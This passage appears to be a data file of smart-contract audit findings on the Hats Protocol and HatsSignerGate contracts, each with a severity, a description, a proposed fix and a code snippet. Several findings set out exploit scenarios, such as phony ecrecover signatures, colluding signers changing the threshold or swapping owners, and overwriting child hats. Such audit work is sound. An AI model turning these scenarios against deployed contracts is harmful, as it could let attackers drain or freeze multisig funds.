There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.",There should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.,"Signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.",```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n +HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCount,high,"The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. 
No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. 
This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\n","The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. 
Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n","As mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.","```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n" +Signers can bypass checks and change threshold within a transaction,high,"The `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. 
The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. 
However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.","Save the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.","Signers can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.",```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n +Hats can be overwritten,medium,"Child hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. 
This attack can be carried out by any hat wearer on their child tree, mutating their properties.","Check if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, ""Admin not created"")\\n```\\n",,"```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n" +"targetThreshold can be set below minThreshold, violating important invariant",medium,"There are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. 
However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all transactions to fail.",Perform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n,"Settings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.",```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n +Swap Signer fails if final owner is invalid due to off by one error in loop,medium,"New users attempting to call `claimSigner()` when there is already a full slate of owners are 
supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it 
will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.",Perform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\n,"When only the final owner is invalid, new users will not be able to claim their role as signer, even through they should.","```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n" +"If a hat is owned by address(0), phony signatures will be accepted by the safe",medium,"If a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. 
See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. 
However, the result would be a free signer on the multisig, which would have dramatic consequences.",The easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.,"If a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.","```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n" +"If signer gate is deployed to safe with more than 5 existing modules, safe will be bricked",medium,"`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. 
If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.","The `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] 
memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != moduleWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\n","If a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.","```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n" +[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`,medium,"`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. 
In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Let's imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. (4) In this case, while the number of `validSignerCount` increased, the `_removeSigner` reduces one.",Check if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\n,"This can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.",```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n +The Hats contract needs to override the ERC1155.balanceOfBatch function,medium,"The Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] 
calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, ""LENGTH_MISMATCH"");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\n",Consider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.,"This will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projects","```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n" +Unbound recursive function call can use unlimited gas and break hats operation,medium,"some of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. 
functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer 
of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 ""root hat"" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 ""root hat"" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.",code should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. 
(keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold),it won't be possible to perform actions for those hats and funds can be lost because of it.,"```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if 
(isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n" +Owners can be swapped even though they still wear their signer hats,medium,"`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n // rest of code\\n```\\n","Perform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.",bypass restrictions and perform action that should be disallowed.,"```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n // rest of code\\n```\\n" +Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold,high,"The safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). 
However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. 
